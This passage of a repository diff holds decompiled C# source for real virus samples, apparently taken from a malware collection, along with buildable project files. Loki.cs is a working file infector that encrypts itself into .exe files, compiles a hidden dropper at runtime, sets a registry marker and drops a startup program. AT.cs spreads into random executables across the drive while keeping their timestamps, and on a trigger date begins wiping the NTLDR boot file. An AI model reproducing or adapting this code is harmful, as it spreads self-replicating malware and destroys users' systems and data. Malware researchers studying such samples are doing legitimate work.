GlobalSection(ProjectConfigurationPlatforms) = postSolution
{17EC3B78-A178-42F5-B9C7-DDE7ADB60015}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{17EC3B78-A178-42F5-B9C7-DDE7ADB60015}.Debug|Any CPU.Build.0 = Debug|Any CPU
{17EC3B78-A178-42F5-B9C7-DDE7ADB60015}.Release|Any CPU.ActiveCfg = Release|Any CPU
{17EC3B78-A178-42F5-B9C7-DDE7ADB60015}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Virus/MSIL/G/Virus.MSIL.Gastropod-3da647492dbf464bd7c6ca18c70e0a510e03dd25b149786cd96bf8c8dbcaa29e/zwuUkpmiAMoxhf/lapixb.cs
+1916
View File
File diff suppressed because it is too large Load Diff
MSIL/Virus/MSIL/K/Virus.MSIL.Kilo.a-f94fb78411f11c9fe81fb962c63346417fe58b0057f41acb265173818d922567/AssemblyInfo.cs
+16
View File
@@ -0,0 +1,16 @@
using System.Reflection;
using System.Runtime.InteropServices;
using System.Security.Permissions;
[assembly: AssemblyProduct("")]
[assembly: Guid("4086dd52-8274-4eb3-8a28-7de497915d23")]
[assembly: ComVisible(false)]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCopyright("")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyTitle("")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: SecurityPermission(SecurityAction.RequestMinimum, SkipVerification = true)]
MSIL/Virus/MSIL/K/Virus.MSIL.Kilo.a-f94fb78411f11c9fe81fb962c63346417fe58b0057f41acb265173818d922567/Loki.cs
+256
View File
@@ -0,0 +1,256 @@
// Decompiled with JetBrains decompiler
// Type: Loki.Loki
// Assembly: Loki, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 803A5091-7913-4057-8BFA-DEFEA0629B18
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Kilo.a-f94fb78411f11c9fe81fb962c63346417fe58b0057f41acb265173818d922567.exe
using Microsoft.CSharp;
using Microsoft.Win32;
using System;
using System.CodeDom.Compiler;
using System.Collections;
using System.Diagnostics;
using System.IO;
using System.Security.Cryptography;
using System.Text;
namespace Loki
{
internal class Loki
{
private int encm = 0;
private string k = (string) null;
private string iv = (string) null;
public void Populate(string dir)
{
if (!Directory.Exists(dir))
return;
string[] files = Directory.GetFiles(dir, "*.exe");
for (int index1 = 0; index1 < files.Length; ++index1)
{
try
{
byte[] numArray1 = this.read(files[index1]);
if (numArray1[60] != (byte) 128)
{
new Random().Next(1000);
string d = Convert.ToString(Process.GetCurrentProcess().MainModule.FileName);
string str1 = Directory.GetCurrentDirectory() + "\\" + this.Rand() + ".exe";
string str2 = Directory.GetCurrentDirectory() + "\\" + this.Rand() + (object) DateTime.Now.Year + ".exe";
byte[] numArray2 = this.read(d);
FileStream output1 = new FileStream(str1, FileMode.CreateNew);
BinaryWriter binaryWriter1 = new BinaryWriter((Stream) output1);
for (int index2 = 0; index2 < numArray2.Length; ++index2)
binaryWriter1.BaseStream.WriteByte(numArray2[index2]);
binaryWriter1.Close();
output1.Close();
this.Encrypt(str1, str2, this.encm);
if (File.Exists(str2))
{
if (File.Exists(str1))
File.Delete(str1);
int length = (int) new FileInfo(files[index1]).Length;
string str3 = this.Decryptor(str2, 5632, length + 5632, this.encm);
if (File.Exists(str3))
{
byte[] numArray3 = this.read(str3);
byte[] numArray4 = this.read(str2);
if (File.Exists(files[index1]))
{
File.Delete(files[index1]);
FileStream output2 = new FileStream(files[index1], FileMode.CreateNew);
BinaryWriter binaryWriter2 = new BinaryWriter((Stream) output2);
for (int index3 = 0; index3 < numArray3.Length; ++index3)
binaryWriter2.BaseStream.WriteByte(numArray3[index3]);
for (int index4 = 0; index4 < numArray1.Length; ++index4)
binaryWriter2.BaseStream.WriteByte(numArray1[index4]);
for (int index5 = 0; index5 < numArray4.Length; ++index5)
binaryWriter2.BaseStream.WriteByte(numArray4[index5]);
binaryWriter2.Close();
output2.Close();
File.Delete(str2);
File.Delete(str3);
}
}
else if (File.Exists(str2))
File.Delete(str2);
}
}
}
catch
{
}
}
}
public byte[] read(string d)
{
FileStream input = new FileStream(d, FileMode.Open, FileAccess.Read);
BinaryReader binaryReader = new BinaryReader((Stream) input);
byte[] numArray = new byte[input.Length];
for (int index = 0; index < numArray.Length; ++index)
numArray[index] = binaryReader.ReadByte();
binaryReader.Close();
input.Close();
return numArray;
}
public void Encrypt(string inf, string outf, int e)
{
if (e == 1)
{
try
{
string s = this.getKey();
if (s.Length > 8)
s = s.Substring(0, 8);
else if (s.Length < 8)
{
int num = 8 - s.Length;
for (int index = 0; index < num; ++index)
s += (string) (object) index;
}
byte[] bytes = new UnicodeEncoding().GetBytes(s);
FileStream fileStream1 = new FileStream(outf, FileMode.Create);
RijndaelManaged rijndaelManaged = new RijndaelManaged();
CryptoStream cryptoStream = new CryptoStream((Stream) fileStream1, rijndaelManaged.CreateEncryptor(bytes, bytes), CryptoStreamMode.Write);
FileStream fileStream2 = new FileStream(inf, FileMode.Open);
int num1;
while ((num1 = fileStream2.ReadByte()) != -1)
cryptoStream.WriteByte((byte) num1);
fileStream2.Close();
cryptoStream.Close();
fileStream1.Close();
}
catch
{
}
}
else
{
try
{
byte[] buffer = this.read(inf);
byte[] rgbKey = Convert.FromBase64String(this.getKey());
byte[] rgbIV = Convert.FromBase64String(this.getIV());
FileStream fileStream = File.Open(outf, FileMode.OpenOrCreate);
CryptoStream output = new CryptoStream((Stream) fileStream, new TripleDESCryptoServiceProvider().CreateEncryptor(rgbKey, rgbIV), CryptoStreamMode.Write);
BinaryWriter binaryWriter = new BinaryWriter((Stream) output);
binaryWriter.Write(buffer);
binaryWriter.Close();
output.Close();
fileStream.Close();
}
catch
{
}
}
}
public string Decryptor(string f, int num, int hl, int e)
{
string path = Directory.GetCurrentDirectory() + "\\" + this.Rand() + (object) DateTime.Now.Year + ".exe";
ICodeCompiler compiler = new CSharpCodeProvider().CreateCompiler();
CompilerParameters options = new CompilerParameters();
options.ReferencedAssemblies.Add("System.dll");
options.ReferencedAssemblies.Add("System.Windows.Forms.dll");
options.GenerateExecutable = true;
options.CompilerOptions = "/target:winexe";
options.OutputAssembly = path;
Random random = new Random();
string str1 = this.Rand() + (object) random.Next(100);
string str2 = this.Rand() + (object) hl;
string str3 = this.Rand() + (object) random.Next(hl);
string str4 = "\nusing System; \nusing System.Windows.Forms; \nusing System.Security.Cryptography; \nusing System.Text; \nusing System.Diagnostics; \nusing System.IO; \nusing System.Threading; \nnamespace " + str1 + " { \n class " + str1 + str2 + ": Form { \n static string cf = Convert.ToString(Process.GetCurrentProcess().MainModule.FileName); \n static string inf = @\"" + f + "\"; \n static string outf = @\"" + str2 + ".exe\"; \n static string tmp = @\"" + str2 + str3 + ".exe\"; \n";
string str5;
if (e == 1)
str5 = str4 + "static string p = @\"" + this.getKey() + "\"; \n";
else
str5 = str4 + "static byte[] Key = Convert.FromBase64String(\"" + this.getKey() + "\"); \nstatic byte[] IV = Convert.FromBase64String(\"" + this.getIV() + "\"); \n";
string str6 = str5 + " public static void Main() { \n " + str3 + "(); \n } \n private static void " + str3 + "() { \n try { \n FileStream fs = new FileStream(cf, FileMode.Open, FileAccess.Read); \n BinaryReader brb = new BinaryReader(fs); \n byte[] b = new byte[fs.Length]; \n for (int q = 0; q < b.Length; q++) { \n b[q] = brb.ReadByte(); \n } \n brb.Close(); \n fs.Close(); \n FileStream fsb = new FileStream(tmp, FileMode.CreateNew); \n BinaryWriter bwb = new BinaryWriter(fsb); \n for (int z = " + (object) num + "; z < " + (object) hl + "; z++) { \n bwb.BaseStream.WriteByte(b[z]); \n } \n fsb.Close(); \n bwb.Close(); \n File.SetAttributes(tmp, FileAttributes.Hidden); \n try { \n Process.Start(tmp).WaitForExit(); \n File.Delete(tmp); \n } catch { } \n FileStream fb = new FileStream(inf, FileMode.CreateNew); \n BinaryWriter bw = new BinaryWriter(fb); \n for (int z = " + (object) hl + "; z < b.Length; z++) { \n bw.BaseStream.WriteByte(b[z]); \n } \n fb.Close(); \n bw.Close(); \n File.SetAttributes(inf, FileAttributes.Hidden); \n";
string source = (e != 1 ? str6 + " FileStream fr = new FileStream(inf, FileMode.Open); \n CryptoStream cs = new CryptoStream(fr, new TripleDESCryptoServiceProvider().CreateDecryptor(Key, IV), CryptoStreamMode.Read); \n if(File.Exists(outf)) { \n File.Delete(outf); \n } \n FileStream o = new FileStream(outf, FileMode.Create); \n int data; \n while((data = cs.ReadByte()) != -1) { \n o.WriteByte((byte)data); \n } \n o.Close(); \n cs.Close(); \n fr.Close(); \n" : str6 + " if(p.Length > 8) { \n p = p.Substring(0,8); \n } else if(p.Length < 8) { \n int a = 8 - p.Length; \n for(int i = 0; i < a; i++) \n p = p + i; \n } \n UnicodeEncoding UE = new UnicodeEncoding(); \n byte[] k = UE.GetBytes(p); \n FileStream fr = new FileStream(inf, FileMode.Open); \n RijndaelManaged r = new RijndaelManaged(); \n CryptoStream cs = new CryptoStream(fr, r.CreateDecryptor(k, k), CryptoStreamMode.Read); \n if(File.Exists(outf)) { \n File.Delete(outf); \n } \n FileStream o = new FileStream(outf, FileMode.Create); \n int data; \n while((data = cs.ReadByte()) != -1) { \n o.WriteByte((byte)data); \n } \n o.Close(); \n cs.Close(); \n fr.Close(); \n") + " if(File.Exists(inf)) { \n File.Delete(inf); \n } \n Thread t = new Thread(new ThreadStart(" + str3 + str2 + ")); \n t.Start(); \n } catch (Exception er) { \n \n } \n } \n private static void " + str3 + str2 + "() { \n try { \n Process.Start(outf).WaitForExit(); \n File.Delete(outf); \n } catch { } \n } \n \n } \n} \n";
CompilerResults compilerResults = compiler.CompileAssemblyFromSource(options, source);
if (compilerResults.Errors.Count > 0)
{
string str7 = "Compilation failed:\n";
foreach (CompilerError error in (CollectionBase) compilerResults.Errors)
str7 = str7 + error.ToString() + "\n";
Console.WriteLine("There were compilation errors");
Console.WriteLine(str7);
}
if (File.Exists(path))
File.SetAttributes(path, FileAttributes.Hidden);
return path;
}
public string Rand()
{
string str1 = "abcdefghijkmnopqrstuvwxyzABCDEFGHJKLMNOPQRSTUVWXYZ";
Random random = new Random();
string str2 = "";
for (int index = 0; index < random.Next(100); ++index)
str2 += (string) (object) str1[random.Next(str1.Length)];
return str2;
}
public void Generatekey(int e)
{
if (e == 1)
{
this.setKey(Encoding.ASCII.GetString(DES.Create().Key));
this.setEncm(e);
}
else
{
TripleDESCryptoServiceProvider cryptoServiceProvider = new TripleDESCryptoServiceProvider();
this.setKey(Convert.ToBase64String(cryptoServiceProvider.Key));
this.setIV(Convert.ToBase64String(cryptoServiceProvider.IV));
this.setEncm(e);
}
}
public bool Check()
{
if ((string) Registry.GetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Loki", nameof (Loki), (object) nameof (Loki)) == nameof (Loki))
return true;
Registry.LocalMachine.OpenSubKey("Software", true).CreateSubKey(nameof (Loki)).SetValue(nameof (Loki), (object) nameof (Loki));
return false;
}
public void GenerateMsg()
{
ICodeCompiler compiler = new CSharpCodeProvider().CreateCompiler();
CompilerParameters options = new CompilerParameters();
Random random = new Random();
string str = Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + (object) random.Next(100000) + ".exe";
options.ReferencedAssemblies.Add("System.dll");
options.ReferencedAssemblies.Add("System.Windows.Forms.dll");
options.ReferencedAssemblies.Add("System.Data.dll");
options.ReferencedAssemblies.Add("System.Drawing.dll");
options.GenerateExecutable = true;
options.CompilerOptions = "/target:winexe";
options.OutputAssembly = str;
string source = this.DeCode("dXNpbmcgU3lzdGVtOyAKdXNpbmcgU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWM7IAp1c2luZyBTeXN0ZW0uQ29tcG9uZW50TW9kZWw7IAp1c2luZyBTeXN0ZW0uRGF0YTsgCnVzaW5nIFN5c3RlbS5EcmF3aW5nOyAKdXNpbmcgU3lzdGVtLlRleHQ7IAp1c2luZyBTeXN0ZW0uV2luZG93cy5Gb3JtczsgCm5hbWVzcGFjZSBzY3IgeyAKc3RhdGljIGNsYXNzIFByb2dyYW0gewogICBbU1RBVGhyZWFkXQogICBzdGF0aWMgdm9pZCBNYWluKCkgewpBcHBsaWNhdGlvbi5FbmFibGVWaXN1YWxTdHlsZXMoKTsKQXBwbGljYXRpb24uU2V0Q29tcGF0aWJsZVRleHRSZW5kZXJpbmdEZWZhdWx0KGZhbHNlKTsKQXBwbGljYXRpb24uUnVuKG5ldyBGb3JtMSgpKTsgCn0gCn0gCnBhcnRpYWwgY2xhc3MgRm9ybTEgewpwcml2YXRlIFN5c3RlbS5Db21wb25lbnRNb2RlbC5JQ29udGFpbmVyIGNvbXBvbmVudHMgPSBudWxsOwpwcm90ZWN0ZWQgb3ZlcnJpZGUgdm9pZCBEaXNwb3NlKGJvb2wgZGlzcG9zaW5nKSB7CmlmIChkaXNwb3NpbmcgJiYgKGNvbXBvbmVudHMgIT0gbnVsbCkpIHsKY29tcG9uZW50cy5EaXNwb3NlKCk7Cn0KYmFzZS5EaXNwb3NlKGRpc3Bvc2luZyk7Cn0KcHJpdmF0ZSB2b2lkIEluaXRpYWxpemVDb21wb25lbnQoKSB7CnRoaXMuY29tcG9uZW50cyA9IG5ldyBTeXN0ZW0uQ29tcG9uZW50TW9kZWwuQ29udGFpbmVyKCk7CnRoaXMubGFiZWwxID0gbmV3IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsKCk7CnRoaXMudGltZXIxID0gbmV3IFN5c3RlbS5XaW5kb3dzLkZvcm1zLlRpbWVyKHRoaXMuY29tcG9uZW50cyk7CnRoaXMuU3VzcGVuZExheW91dCgpOwp0aGlzLmxhYmVsMS5BdXRvU2l6ZSA9IHRydWU7CnRoaXMubGFiZWwxLkJhY2tDb2xvciA9IFN5c3RlbS5EcmF3aW5nLkNvbG9yLkJsYWNrOwp0aGlzLmxhYmVsMS5Gb250ID0gbmV3IFN5c3RlbS5EcmF3aW5nLkZvbnQoIk1pY3Jvc29mdCBTYW5zIFNlcmlmIiwgMjRGLCBTeXN0ZW0uRHJhd2luZy5Gb250U3R5bGUuUmVndWxhciwgU3lzdGVtLkRyYXdpbmcuR3JhcGhpY3NVbml0LlBvaW50LCAoKGJ5dGUpKDApKSk7CnRoaXMubGFiZWwxLkZvcmVDb2xvciA9IFN5c3RlbS5EcmF3aW5nLkNvbG9yLlJlZDsKdGhpcy5sYWJlbDEuTG9jYXRpb24gPSBuZXcgU3lzdGVtLkRyYXdpbmcuUG9pbnQoMTIsIDIwMSk7CnRoaXMubGFiZWwxLk5hbWUgPSAibGFiZWwxIjsKdGhpcy5sYWJlbDEuU2l6ZSA9IG5ldyBTeXN0ZW0uRHJhd2luZy5TaXplKDAsIDM3KTsKdGhpcy5sYWJlbDEuVGFiSW5kZXggPSAwOwp0aGlzLnRpbWVyMS5UaWNrICs9IG5ldyBTeXN0ZW0uRXZlbnRIYW5kbGVyKHRoaXMudGltZXIxX1RpY2spOwp0aGlzLkF1dG9TY2FsZURpbWVuc2lvbnMgPSBuZXcgU3lzdGVtLkRyYXdpbmcuU2l6ZUYoNkYsIDEzRik7CnRoaXMuQXV0b1NjYWxlTW9kZSA9IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkF1dG9TY2FsZU1vZGUuRm9udDsKdGhpcy5CYWNrZ3JvdW5kSW1hZ2VMYXlvdXQgPSBTeXN0ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxheW91dC5TdHJldGNoOwp0aGlzLkNsaWVudFNpemUgPSBuZXcgU3lzdGVtLkRyYXdpbmcuU2l6ZSg0NzIsIDQ1OSk7CnRoaXMuQ29udHJvbHMuQWRkKHRoaXMubGFiZWwxKTsKdGhpcy5Eb3VibGVCdWZmZXJlZCA9IHRydWU7CnRoaXMuRm9ybUJvcmRlclN0eWxlID0gU3lzdGVtLldpbmRvd3MuRm9ybXMuRm9ybUJvcmRlclN0eWxlLk5vbmU7CnRoaXMuTmFtZSA9ICJGb3JtMSI7CnRoaXMuU2hvd0luVGFza2JhciA9IGZhbHNlOwp0aGlzLlRvcE1vc3QgPSB0cnVlOwp0aGlzLldpbmRvd1N0YXRlID0gU3lzdGVtLldpbmRvd3MuRm9ybXMuRm9ybVdpbmRvd1N0YXRlLk1heGltaXplZDsKdGhpcy5Mb2FkICs9IG5ldyBTeXN0ZW0uRXZlbnRIYW5kbGVyKHRoaXMuRm9ybTFfTG9hZF8xKTsKdGhpcy5SZXN1bWVMYXlvdXQoZmFsc2UpOwp0aGlzLlBlcmZvcm1MYXlvdXQoKTsKfQpwcml2YXRlIFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsIGxhYmVsMTsKcHJpdmF0ZSBTeXN0ZW0uV2luZG93cy5Gb3Jtcy5UaW1lciB0aW1lcjE7Cn0gCnB1YmxpYyBwYXJ0aWFsIGNsYXNzIEZvcm0xIDogRm9ybSB7IApwdWJsaWMgRm9ybTEoKSB7IApJbml0aWFsaXplQ29tcG9uZW50KCk7IAp9IApwcm90ZWN0ZWQgb3ZlcnJpZGUgdm9pZCBPblBhaW50QmFja2dyb3VuZChQYWludEV2ZW50QXJncyBlKSB7IAplLkdyYXBoaWNzLkRyYXdSZWN0YW5nbGUobmV3IFBlbihDb2xvci5CbGFjayksIDAsIDAsIFNpemUuV2lkdGgsIFNpemUuSGVpZ2h0KTsgCn0gCnByaXZhdGUgdm9pZCBGb3JtMV9Mb2FkXzEob2JqZWN0IHNlbmRlciwgRXZlbnRBcmdzIGUpIHsgCnRoaXMuU2V0U3R5bGUoQ29udHJvbFN0eWxlcy5PcHRpbWl6ZWREb3VibGVCdWZmZXIgfCBDb250cm9sU3R5bGVzLlVzZXJQYWludCB8IENvbnRyb2xTdHlsZXMuQWxsUGFpbnRpbmdJbldtUGFpbnQsIHRydWUpOyAKdGhpcy5DYXB0dXJlID0gdHJ1ZTsgCkN1cnNvci5IaWRlKCk7IApCb3VuZHMgPSBTY3JlZW4uUHJpbWFyeVNjcmVlbi5Cb3VuZHM7IApXaW5kb3dTdGF0ZSA9IEZvcm1XaW5kb3dTdGF0ZS5NYXhpbWl6ZWQ7IApTaG93SW5UYXNrYmFyID0gZmFsc2U7IApEb3VibGVCdWZmZXJlZCA9IHRydWU7IApCYWNrZ3JvdW5kSW1hZ2VMYXlvdXQgPSBJbWFnZUxheW91dC5TdHJldGNoOyAKdGltZXIxLkludGVydmFsID0gMTAwMDsgCnRpbWVyMS5TdGFydCgpOyAKfSAKcHJpdmF0ZSB2b2lkIHNjcm9sbCgpIHsgCmxhYmVsMS5UZXh0ID0gIkluZmVjdGVkIHdpdGggTVNJTC5Mb2tpIGJ5IGZyZWUwbiB8IERvb21SaWRlcnoiOyAKUmFuZG9tIHIgPSBuZXcgUmFuZG9tKCk7IApsYWJlbDEuU2V0Qm91bmRzKHIuTmV4dCgxMDApLCByLk5leHQoMTAwMCksIHIuTmV4dCgxMDAwKSwgci5OZXh0KDEwMDApKTsKfQpwcml2YXRlIHZvaWQgdGltZXIxX1RpY2sob2JqZWN0IHNlbmRlciwgRXZlbnRBcmdzIGUpIHsKc2Nyb2xsKCk7Cn0KfSAKfSAK");
compiler.CompileAssemblyFromSource(options, source);
}
public void Send()
{
}
private string DeCode(string s) => Encoding.UTF8.GetString(Convert.FromBase64String(s));
public string getKey() => this.k;
public void setKey(string key) => this.k = key;
public string getIV() => this.iv;
public void setIV(string i) => this.iv = i;
public int getEncm() => this.encm;
public void setEncm(int s) => this.encm = s;
}
}
MSIL/Virus/MSIL/K/Virus.MSIL.Kilo.a-f94fb78411f11c9fe81fb962c63346417fe58b0057f41acb265173818d922567/Program.cs
+30
View File
@@ -0,0 +1,30 @@
// Decompiled with JetBrains decompiler
// Type: Loki.Program
// Assembly: Loki, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 803A5091-7913-4057-8BFA-DEFEA0629B18
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Kilo.a-f94fb78411f11c9fe81fb962c63346417fe58b0057f41acb265173818d922567.exe
using System;
using System.IO;
namespace Loki
{
internal class Program
{
private static void Main(string[] args)
{
Loki.Loki loki = new Loki.Loki();
Random random = new Random();
int num = 0;
if (random.Next(100) % 2 == 0)
num = 1;
int e = 1;
loki.Generatekey(e);
loki.Populate(Directory.GetCurrentDirectory());
if (loki.Check())
return;
loki.GenerateMsg();
loki.Send();
}
}
}
MSIL/Virus/MSIL/K/Virus.MSIL.Kilo.a-f94fb78411f11c9fe81fb962c63346417fe58b0057f41acb265173818d922567/Virus.MSIL.Kilo.a.csproj
+41
View File
@@ -0,0 +1,41 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Kilo.a-f94fb78411f11c9fe81fb962c63346417fe58b0057f41acb265173818d922567.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{8650BEB2-E230-416B-8E8F-D394A701746D}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Loki</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>Loki</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
</ItemGroup>
<ItemGroup>
<Compile Include="Program.cs" />
<Compile Include="Loki.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Virus/MSIL/K/Virus.MSIL.Kilo.a-f94fb78411f11c9fe81fb962c63346417fe58b0057f41acb265173818d922567/Virus.MSIL.Kilo.a.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Loki", "Virus.MSIL.Kilo.a-f94fb78411f11c9fe81fb962c63346417fe58b0057f41acb265173818d922567.csproj", "{8650BEB2-E230-416B-8E8F-D394A701746D}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{8650BEB2-E230-416B-8E8F-D394A701746D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{8650BEB2-E230-416B-8E8F-D394A701746D}.Debug|Any CPU.Build.0 = Debug|Any CPU
{8650BEB2-E230-416B-8E8F-D394A701746D}.Release|Any CPU.ActiveCfg = Release|Any CPU
{8650BEB2-E230-416B-8E8F-D394A701746D}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Virus/MSIL/R/Virus.MSIL.Radalatan.a-d571d0a027abe052fac96d24ed62862eaec85ae17dc1a2a1294afbd91def7f3a/AT.cs
+231
View File
@@ -0,0 +1,231 @@
// Decompiled with JetBrains decompiler
// Type: V1.AT
// Assembly: V1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 75B1FFE9-190F-41EC-A0FC-C0D6E565045F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Radalatan.a-d571d0a027abe052fac96d24ed62862eaec85ae17dc1a2a1294afbd91def7f3a.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.IO;
using System.Windows.Forms;
namespace V1
{
[StandardModule]
internal sealed class AT
{
[STAThread]
public static void Main()
{
byte[] array1 = new byte[5120];
byte[] array2 = new byte[5120];
string executablePath = Application.ExecutablePath;
Process Expression;
try
{
FileStream fileStream1 = new FileStream(executablePath, FileMode.Open, FileAccess.Read);
fileStream1.Read(array1, 0, 5120);
if (new FileInfo(executablePath).Length >= 10240L)
{
try
{
fileStream1.Seek(-5120L, SeekOrigin.End);
fileStream1.Read(array2, 0, 5120);
fileStream1.Close();
while (true)
{
string tempFileName = Path.GetTempFileName();
try
{
FileSystem.Kill(tempFileName);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
string str = StringType.FromObject(ObjectType.StrCatObj(ObjectType.StrCatObj(ObjectType.StrCatObj((object) Path.GetDirectoryName(executablePath), Interaction.IIf(StringType.StrCmp(Strings.Right(Path.GetDirectoryName(executablePath), 1), "\\", false) == 0, (object) "", (object) "\\")), (object) Path.GetFileNameWithoutExtension(tempFileName)), (object) ".EXE"));
try
{
FileSystem.SetAttr(str, FileAttribute.Normal);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
File.Copy(executablePath, str, true);
FileStream fileStream2 = new FileStream(str, FileMode.Open, FileAccess.Write);
fileStream2.Write(array2, 0, 5120);
fileStream2.Close();
Expression = Process.Start(str, Interaction.Command());
break;
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
int num;
if (num < 10)
{
checked { ++num; }
ProjectData.ClearProjectError();
}
else
{
ProjectData.ClearProjectError();
break;
}
}
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
else
fileStream1.Close();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.EndApp();
ProjectData.ClearProjectError();
}
string tempFileName1;
string[] strArray;
try
{
tempFileName1 = Path.GetTempFileName();
Process process = new Process();
ProcessStartInfo startInfo = process.StartInfo;
startInfo.FileName = "Cmd.exe";
startInfo.Arguments = "/c dir \\*.exe /s/b/a-d >" + tempFileName1;
startInfo.WindowStyle = ProcessWindowStyle.Hidden;
process.Start();
process.WaitForExit();
StreamReader streamReader = new StreamReader(tempFileName1);
strArray = streamReader.ReadToEnd().Split('\r');
streamReader.Close();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
goto label_38;
}
try
{
File.Create(tempFileName1).Close();
FileSystem.Kill(tempFileName1);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
VBMath.Randomize();
int num1 = 0;
int num2 = checked ((int) Math.Round((double) Conversion.Int(unchecked (VBMath.Rnd() * 25f))));
int num3 = 0;
while (num3 <= num2)
{
try
{
FileInfo fileInfo = new FileInfo(Strings.Mid(strArray[checked ((int) Math.Round((double) Conversion.Int(unchecked (VBMath.Rnd() * (float) strArray.Length))))], 2));
if (fileInfo.Length >= 5120L)
{
byte attr = checked ((byte) (uint) FileSystem.GetAttr(fileInfo.FullName));
DateTime creationTime = fileInfo.CreationTime;
DateTime lastAccessTime = fileInfo.LastAccessTime;
DateTime lastWriteTime = fileInfo.LastWriteTime;
FileSystem.SetAttr(fileInfo.FullName, FileAttribute.Normal);
FileStream fileStream = new FileStream(fileInfo.FullName, FileMode.Open, FileAccess.ReadWrite);
fileStream.Read(array2, 0, 5120);
if (StringType.StrCmp(BitConverter.ToString(array2), BitConverter.ToString(array1), false) != 0)
{
fileStream.Seek(0L, SeekOrigin.Begin);
fileStream.Write(array1, 0, 5120);
fileStream.Seek(0L, SeekOrigin.End);
fileStream.Write(array2, 0, 5120);
}
else if (num1 < 30)
{
checked { --num3; }
checked { ++num1; }
}
else
break;
fileStream.Close();
FileSystem.SetAttr(fileInfo.FullName, (FileAttribute) attr);
fileInfo.CreationTime = creationTime;
fileInfo.LastAccessTime = lastAccessTime;
fileInfo.LastWriteTime = lastWriteTime;
}
else if (num1 < 30)
{
checked { --num3; }
checked { ++num1; }
}
else
break;
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
if (num1 < 30)
{
checked { --num3; }
checked { ++num1; }
ProjectData.ClearProjectError();
}
else
{
ProjectData.ClearProjectError();
break;
}
}
checked { ++num3; }
}
label_38:
if (!Information.IsNothing((object) Expression))
{
ProcessStartInfo startInfo = Expression.StartInfo;
try
{
Expression.WaitForExit();
FileSystem.SetAttr(startInfo.FileName, FileAttribute.Normal);
File.Create(startInfo.FileName).Close();
FileSystem.Kill(startInfo.FileName);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
DateTime today = DateTime.Today;
if (today.Month != 5)
return;
if (today.Day != 17)
return;
try
{
string str = Strings.Left(Environment.SystemDirectory, 3) + "NTLDR";
FileSystem.SetAttr(str, FileAttribute.Normal);
File.Create(str).Close();
